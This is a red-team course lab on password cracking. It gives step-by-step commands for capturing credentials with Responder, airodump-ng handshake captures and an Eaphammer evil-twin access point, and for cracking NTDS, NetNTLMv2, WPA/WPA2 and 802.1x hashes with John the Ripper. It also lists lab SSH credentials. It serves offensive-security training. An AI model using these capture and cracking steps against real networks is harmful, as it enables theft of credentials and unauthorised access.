L1160-Red Password Cracking

Lab Contents

Password Cracking

Lab Overview

This lab is intended to provide the student some experience with password cracking. The student's previously gathered NTDS file can be cracked, and one has been provided.

Another set of hashes has been provided. These hashes are located in the Linux virtual machine under the /opt/JohnTheRipper/apt directory.

The provided hashes include a hash captured using Responder (NetNTLMv2). Two wireless network handshakes have been provided, one network was using a WPA PSK, the other a WPA2 PSK. The WPA2 key should take a moment longer to crack due to the nature of the hashing algorithm. Finally, a hash was captured from a user who submitted an authentication hash to an Evil Twin AP using Eaphammer.

The hashes provided for this lab are commonly discovered in network environments and in some cases are cracked for privilege escalation and lateral movement opportunities.

Lab Objectives

Crack hashes captured via:
- CrackMapExec
- Responder
- Airodump-ng
- Eaphammer
Investigate packets

Lab Overview

Use previously captured credential hashes with CrackMapExec to compromise an entire domain. Prepare credential hashes and crack them using John the Ripper.

NOTE: The lab is dependent on the completion of Lab L1150 steps 5 and 6 to procure password hashes.

L1150-Red Step 5: Passing the Hash to Domain PWNAGE (DCSync)
L1150-Red Step 6: Prepare Hashes for Password Cracking

To start this lab, complete L1150-Red Step 5 and Step Step 6 if you have not already.

Step One

NTLM Password Cracking (via Domain Dump)

In the previous lab, an SSH Console Session was initiated to 10.10.98.20. This lab can utilize that same session.

For reference, the connection information is presented below. For more information, see Lab L0330.

SSH: itadmin@10.10.98.20
Password: APTClass2021!

Getting Started with John The Ripper

Use the password cracking tool John the Ripper to crack passwords from the NTLM hashes.

The compiled version of "John Jumbo" is available on the course Linux VM. It will be useful in cracking everything available for this lab.

First, some housekeeping: we need a wordlist.

Bash Input

wget https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt -O /opt/wordlist.txt

Bash Output

root@localhost:/opt/JohnTheRipper/run# wget https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt -O /opt/wordlist.txt
--2021-02-01 21:11:32--  https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.192.133, 151.101.64.133, 151.101.0.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.192.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31324 (31K) [text/plain]
Saving to: ‘/opt/wordlist.txt’

/opt/wordlist.txt   100%[===================>]  30.59K  --.-KB/s    in 0.001s

2021-02-01 21:11:32 (33.0 MB/s) - ‘/opt/wordlist.txt’ saved [31324/31324]

Cracking Passwords with John The Ripper

It is time to crack some passwords.

Bash Input

cd /opt/JohnTheRipper/run
./john --wordlist=/opt/wordlist.txt --format=NT --pot=/opt/john.pot /opt/CrackMapExec/cme-domain-Hashes

Bash Input

John the Ripper (should have) successfully cracked a bunch of passwords.

Another "cleartext" secret may be hiding in your AD too. Have you checked for the reversible encryption flag lately? Most modern NTDS extraction tools will check and reverse them on the way out.

Bash Input

cat /opt/CrackMapExec/domain-NTDS |grep -ai cleartext

Bash Input

Step Two

NetNTLMv2 Password Cracking

Bash Input

Responder is a valuable tool to test network protocol controls.

The following command was performed in a controlled environment and is being provided to demonstrate the ease of this attack. DO NOT RUN THIS COMMAND, SKIP TO THE HASH CRACKING SECTION.

python3 Responder.py -I eth0

Bash Output

Bash Input

John the Ripper (jtr) is a valuable tool to test the strength of passwords. The LLMNR attack netted us a user hash, let's see if we can crack the password from it.

First, take a look at the credential hash materials.

cat /opt/JohnTheRipper/apt/ntlmv2-hash.txt

Bash Input

Crack it!

cd /opt/JohnTheRipper/run
./john --wordlist=/opt/wordlist.txt --pot=/opt/john.pot /opt/JohnTheRipper/apt/ntlmv2-hash.txt

Bash Input

John the Ripper (jtr) is a valuable tool to test the strength of passwords.

cd /opt/JohnTheRipper/run
./john --wordlist=/opt/wordlist.txt --pot=/opt/john.pot /opt/JohnTheRipper/apt/ntlmv2-hash.txt

Bash Output

Step Three

Wireless PSK (TKIP) Cracking

Bash Input

WPA is still in use and relies on the temporal key integrity protocol (TKIP). There are some demonstrated weaknesses in the protocol's use as a cipher algorithm. Let's grab the 4-way handshake and take a swing at the crack operation.

The following commands were performed in a controlled environment and are being provided to demonstrate the ease of this attack. DO NOT RUN THESE COMMANDS, SKIP TO THE HASH CRACKING SECTION.

airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon --essid APTDemoWPA -c 6 -w TKIP-handshake

Bash Output

Bash Input

Let's assume that we used airodump-ng to create a .pcap file and captured a four-way handshake. We can then use John to extract the key material and attempt an offline crack.

cd /opt/JohnTheRipper/run
./wpapcap2john /opt/JohnTheRipper/apt/TKIP-handshake-01.cap > /opt/JohnTheRipper/apt/tkip-extract.txt

Bash Output

Bash Input

 ./john --wordlist=/opt/wordlist.txt --pot=/opt/wifi.pot /opt/JohnTheRipper/apt/tkip-extract.txt

Bash Output

Step Four

Wireless PSK (AES) Cracking

WPA2 is the most common implementation of wireless networks protected by pre-shared keys (PSKs).

Bash Input

The following commands were performed in a controlled environment and are being provided to demonstrate the ease of this attack. DO NOT RUN THESE COMMANDS, SKIP TO THE HASH CRACKING SECTION.

airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon --essid APTDemoWPA2 -c 6 -w AES-handshake

Bash Output

Bash Input

Let's assume that we used airodump-ng to create a .pcap file and captured a four-way handshake. We can then use John to extract the key material and attempt an offline crack.

cd /opt/JohnTheRipper/run
./wpapcap2john /opt/JohnTheRipper/apt/AES-handshake-01.cap > /opt/JohnTheRipper/apt/aes-extract.txt

Bash Output

Bash Input

 ./john --wordlist=/opt/wordlist.txt --pot=/opt/wifi.pot /opt/JohnTheRipper/apt/tkip-extract.txt

Bash Output

Step Five

Wireless User Attacks and Cracks

Another option for wireless security, and in some people's opinion, the most secure option. RADIUS networks (802.1x) provided a seamless and almost continuously rotated encryption key pair between station and client. In this case, we attack the user.

Bash Input

Eaphammer is a great tool for this attack.

The following command was performed in a controlled environment and is being provided to demonstrate the ease of this attack. DO NOT RUN THIS COMMAND, SKIP TO THE HASH CRACKING SECTION.

./eaphammer -i wlan1 --channel 6 --auth wpa-eap --essid APTDot1X --creds

Bash Output

Bash Input

Many tools do not produce usable or crackable materials on execution. Review the evil-twin AP attack and Eaphammer output from the previous screenshot and with the next command. The text has the important component parts, but is not crackable as is.

cat /opt/JohnTheRipper/apt/dot1x-hashes.txt

Bash Input

cat /opt/JohnTheRipper/apt/dot1x-hashes.txt |grep jtr |tr -s ' ' |cut -d " " -f4 > /opt/JohnTheRipper/apt/dot1x-hash ; cat /opt/JohnTheRipper/apt/dot1x-hash

Bash Input

Next up on the crack list is the wireless user's NetNTLM hash.

./john --wordlist=/opt/wordlist.txt --pot=/opt/john.pot /opt/JohnTheRipper/apt/dot1x-hash

This completes this lab. Continue on to L1160-Blue

Lab Complete